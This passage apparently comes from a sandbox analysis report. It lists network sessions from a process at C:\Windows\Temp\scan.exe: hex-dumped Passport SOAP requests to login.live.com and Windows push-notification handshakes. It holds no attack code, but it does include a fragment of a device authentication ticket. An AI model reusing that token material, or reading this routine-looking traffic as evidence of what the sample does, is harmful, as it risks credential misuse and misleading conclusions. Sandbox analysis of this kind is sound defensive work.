                                                                                                          2022-08-13 07:07:09 UTC72OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                          Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                          2022-08-13 07:07:09 UTC93INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-store, no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Content-Type: application/soap+xml; charset=utf-8
                                                                                                          Expires: Sat, 13 Aug 2022 07:06:09 GMT
                                                                                                          P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                          x-ms-route-info: R3_BL2
                                                                                                          x-ms-request-id: 6ee7039e-f56c-4534-ae6f-76152b28aec3
                                                                                                          PPServer: PPV: 30 H: BL02PF95F66A88E V: 0
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                          Date: Sat, 13 Aug 2022 07:07:09 GMT
                                                                                                          Connection: close
                                                                                                          Content-Length: 11319
                                                                                                          2022-08-13 07:07:09 UTC94INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          4192.168.2.74976740.126.32.72443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2022-08-13 07:07:09 UTC77OUTPOST /RST2.srf HTTP/1.0
                                                                                                          Connection: Keep-Alive
                                                                                                          Content-Type: application/soap+xml
                                                                                                          Accept: */*
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.27716.00; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                          Content-Length: 4659
                                                                                                          Host: login.live.com
                                                                                                          2022-08-13 07:07:09 UTC77OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                          Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                          2022-08-13 07:07:09 UTC82INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-store, no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Content-Type: application/soap+xml; charset=utf-8
                                                                                                          Expires: Sat, 13 Aug 2022 07:06:09 GMT
                                                                                                          P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                          x-ms-route-info: R3_BL2
                                                                                                          x-ms-request-id: ccdde691-0010-4c2c-9783-65e61108044f
                                                                                                          PPServer: PPV: 30 H: BL02PF9B1474712 V: 0
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                          Date: Sat, 13 Aug 2022 07:07:08 GMT
                                                                                                          Connection: close
                                                                                                          Content-Length: 10813
                                                                                                          2022-08-13 07:07:09 UTC82INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          5192.168.2.74976820.190.159.3443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2022-08-13 07:07:10 UTC105OUTPOST /RST2.srf HTTP/1.0
                                                                                                          Connection: Keep-Alive
                                                                                                          Content-Type: application/soap+xml
                                                                                                          Accept: */*
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29340.5; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                          Content-Length: 4794
                                                                                                          Host: login.live.com
                                                                                                          2022-08-13 07:07:10 UTC105OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                          Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                          2022-08-13 07:07:10 UTC110INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-store, no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Content-Type: application/soap+xml; charset=utf-8
                                                                                                          Expires: Sat, 13 Aug 2022 07:06:10 GMT
                                                                                                          P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                          x-ms-route-info: R3_BL2
                                                                                                          x-ms-request-id: 804569b4-426b-49ac-8f4b-8485210579aa
                                                                                                          PPServer: PPV: 30 H: BL02PF7EE85FE59 V: 0
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                          Date: Sat, 13 Aug 2022 07:07:09 GMT
                                                                                                          Connection: close
                                                                                                          Content-Length: 11093
                                                                                                          2022-08-13 07:07:10 UTC110INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          6192.168.2.74976920.199.120.182443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2022-08-13 07:07:11 UTC121OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 32 34 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 31 64 33 64 33 62 36 65 61 65 30 33 31 31 31 0d 0a 0d 0a
                                                                                                          Data Ascii: CNT 1 CON 246Context: 61d3d3b6eae03111
                                                                                                          2022-08-13 07:07:11 UTC121OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 37 31 33 34 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 55 53 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 34 34 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 37 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.17134</osVer><proc>x64</proc><lcid>en-US</lcid><geoId>244</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware7,1</deviceName></agent></connect>
                                                                                                          2022-08-13 07:07:11 UTC121OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 32 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 31 64 33 64 33 62 36 65 61 65 30 33 31 31 31 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 77 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 61 57 6b 74 37 34 4d 42 39 2f 56 59 74 4b 33 69 75 73 6b 66 74 56 71 4b 4d 38 49 4d 66 33 38 37 73 67 61 4d 39 50 6c 48 38 62 30 47 70 6a 4a 73 68 42 59 44 47 50 56 37 78 74 51 54 44 53 55 32 51 49 41 76 47 74 32 41 64 57 35 7a 2b 49 54 79 48 6e 54 74 58 65 44 77 79 77 31 70 53 4a 4a 35 73 47 58 48 70 4d 65 42 38 63 2b 4d 7a 67 5a 75 76 4a 76 59 56 5a 2f 43 63 46 76 78 43 35 6a 63 48 56 38 46 30 66 54 77
                                                                                                          Data Ascii: ATH 2 CON\DEVICE 1026Context: 61d3d3b6eae03111<device><compact-ticket>t=EwCwAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAaWkt74MB9/VYtK3iuskftVqKM8IMf387sgaM9PlH8b0GpjJshBYDGPV7xtQTDSU2QIAvGt2AdW5z+ITyHnTtXeDwyw1pSJJ5sGXHpMeB8c+MzgZuvJvYVZ/CcFvxC5jcHV8F0fTw
                                                                                                          2022-08-13 07:07:11 UTC122OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 31 30 34 34 34 37 38 20 31 37 30 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 31 64 33 64 33 62 36 65 61 65 30 33 31 31 31 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                          Data Ascii: BND 3 CON\WNS 1044478 170Context: 61d3d3b6eae03111<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                          2022-08-13 07:07:11 UTC123INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                          Data Ascii: 202 1 CON 58
                                                                                                          2022-08-13 07:07:11 UTC123INData Raw: 4d 53 2d 43 56 3a 20 76 59 51 72 56 6c 2f 35 69 6b 2b 53 2f 69 36 36 65 6b 63 30 54 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                          Data Ascii: MS-CV: vYQrVl/5ik+S/i66ekc0TQ.0Payload parsing failed.


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          7192.168.2.74977020.190.159.3443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2022-08-13 07:07:13 UTC123OUTPOST /RST2.srf HTTP/1.0
                                                                                                          Connection: Keep-Alive
                                                                                                          Content-Type: application/soap+xml
                                                                                                          Accept: */*
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29340.5; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                          Content-Length: 4796
                                                                                                          Host: login.live.com
                                                                                                          2022-08-13 07:07:13 UTC123OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                          Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                          2022-08-13 07:07:13 UTC133INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-store, no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Content-Type: application/soap+xml; charset=utf-8
                                                                                                          Expires: Sat, 13 Aug 2022 07:06:13 GMT
                                                                                                          P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                          x-ms-route-info: R3_BL2
                                                                                                          x-ms-request-id: 40a17c16-f588-4176-8768-efd90b1d8e45
                                                                                                          PPServer: PPV: 30 H: BL6PPF95DEAA346 V: 0
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                          Date: Sat, 13 Aug 2022 07:07:13 GMT
                                                                                                          Connection: close
                                                                                                          Content-Length: 11093
                                                                                                          2022-08-13 07:07:13 UTC133INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          8192.168.2.74977120.190.159.3443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2022-08-13 07:07:13 UTC128OUTPOST /RST2.srf HTTP/1.0
                                                                                                          Connection: Keep-Alive
                                                                                                          Content-Type: application/soap+xml
                                                                                                          Accept: */*
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29340.5; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                          Content-Length: 4796
                                                                                                          Host: login.live.com
                                                                                                          2022-08-13 07:07:13 UTC128OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                          Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                          2022-08-13 07:07:13 UTC144INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-store, no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Content-Type: application/soap+xml; charset=utf-8
                                                                                                          Expires: Sat, 13 Aug 2022 07:06:13 GMT
                                                                                                          P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                          x-ms-route-info: R3_BL2
                                                                                                          x-ms-request-id: 40de4ff1-8c69-4023-8f17-e0bd630a5e1b
                                                                                                          PPServer: PPV: 30 H: BL02PFBA5FEC66C V: 0
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                          Date: Sat, 13 Aug 2022 07:07:12 GMT
                                                                                                          Connection: close
                                                                                                          Content-Length: 11093
                                                                                                          2022-08-13 07:07:13 UTC145INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          9192.168.2.74977420.199.120.151443C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          2022-08-13 07:07:16 UTC156OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 32 34 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 66 34 32 30 66 39 31 38 35 32 38 36 37 34 38 36 0d 0a 0d 0a
                                                                                                          Data Ascii: CNT 1 CON 246Context: f420f91852867486
